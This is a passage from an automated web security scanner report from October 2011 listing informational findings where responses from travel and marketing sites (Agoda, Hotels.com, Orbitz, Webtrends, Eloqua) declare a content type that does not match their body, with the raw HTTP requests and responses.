Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:38:07 GMT
Connection: keep-alive
Content-Length: 106

.PNG
.
...IHDR......."......-.....1IDATx..... .....l.BTu
../.X....mH2..A.#..02..$..,u....*.....IEND.B`.

28.30. http://img.agoda.net/images/default/google_search.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.agoda.net
Path:   /images/default/google_search.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/default/google_search.gif HTTP/1.1
Host: img.agoda.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 24 Feb 2011 07:08:02 GMT
Accept-Ranges: bytes
ETag: "0752d93f1d3cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: Keep-Alive
Date: Mon, 03 Oct 2011 00:37:38 GMT
Age: 1277
Content-Length: 717

.PNG
.
...IHDR...w...........3.....IDATx...]k.0....H.
...M......6....l...+....@].u.Q4...g]:.88(..}.s.>..,.V...2.,/(u]g.[f?....jEi.R~,...OG.|^z.K.pG.../.j....%..:......q>.}.~5.b..|...i]RU..[.e'..(Z
...[SNIP]...

28.31. http://img.agoda.net/images/default/mouse_overbg.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.agoda.net
Path:   /images/default/mouse_overbg.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/default/mouse_overbg.gif HTTP/1.1
Host: img.agoda.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Type: image/gif
Last-Modified: Mon, 06 Jun 2011 06:27:36 GMT
Accept-Ranges: bytes
ETag: "0bc4dd31224cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 00:38:07 GMT
Connection: keep-alive
Content-Length: 114

.PNG
.
...IHDR...............t....9IDATx.}.7..0..0...VoN........v....nTU(3QD wGf.T... fF......u.........IEND.B`.

28.32. http://ipinvite.iperceptions.com/Invitations/Javascripts/customInvites.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ipinvite.iperceptions.com
Path:   /Invitations/Javascripts/customInvites.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Invitations/Javascripts/customInvites.aspx?sid=910 HTTP/1.1
Host: ipinvite.iperceptions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Mon, 03 Oct 2011 00:08:03 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-by: INVSVR11
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 351

var _http = document.location.protocol;var gLink = _http +'//ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_910.js';var script = document.createElement('script'); script.setA
...[SNIP]...

28.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=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.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:28 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:00:28 GMT
Pragma: no-cache
Content-Length: 538
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAY
...[SNIP]...

28.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:10 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 00:09:10 GMT
Pragma: no-cache
Content-Length: 536
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYS
...[SNIP]...

28.35. http://now.eloqua.com/visitor/v200/svrGP.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2598&ref2=http%3A//www.manutd.com/en/Club/Sponsors.aspx%3Fsponsorid%3D%7BF745DA14-CB5E-4A81-816A-8DB410E47A75%7D&tzo=360&ms=133 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/default.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:59:09 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

28.36. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

Summary

Severity:   Information
Confidence:   Firm
Host:   http://orbitz.tt.omtrdc.net
Path:   /m2/orbitz/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/orbitz/mbox/standard?mboxHost=www.orbitz.com&mboxSession=1317600406536-142286&mboxPC=1317600406536-142286.19&mboxPage=1317601629903-922630&screenHeight=1200&screenWidth=1920&browserWidth=700&browserHeight=700&browserTimeOffset=-300&colorDepth=16&mboxCount=1&numberOfNights=3&numberOfRooms=1&mbox=hotel210&mboxId=0&mboxTime=1317583632469&mboxURL=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot%26hsv.showDetails%3Dtrue%26hotel.hid%3D10417%26hotel.hkey%3D10417_null_null_null_A1%3A0&mboxReferrer=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&mboxVersion=39 HTTP/1.1
Host: orbitz.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 163
Date: Mon, 03 Oct 2011 00:27:17 GMT
Server: Test & Target

mboxFactories.get('default').get('hotel210',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317600406536-142286.19");

28.37. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard

Summary

Severity:   Information
Confidence:   Firm
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/orbitzaway/mbox/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=2&mbox=trip_landing_providers_onload&mboxId=0&mboxTime=1317584100695&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 184
Date: Mon, 03 Oct 2011 00:35:03 GMT
Server: Test & Target

mboxFactories.get('default').get('trip_landing_providers_onload',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");

28.38. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0
aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6FBCA80F75E0528A929525FF0B85D1D0; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=e1f36dbd085f0041d284; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=E7131C81E64A38E81B17329B424FCCDB; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; Expires=Sun, 01-Jan-2012 00:03:13 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=019dddd1; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93204194090; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.39. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f0088adcd; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1836E1C2F530E7BCED230AB0A2091BE5; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; Expires=Sun, 01-Jan-2012 00:02:17 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=045f6179; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202c8abcc; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.40. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
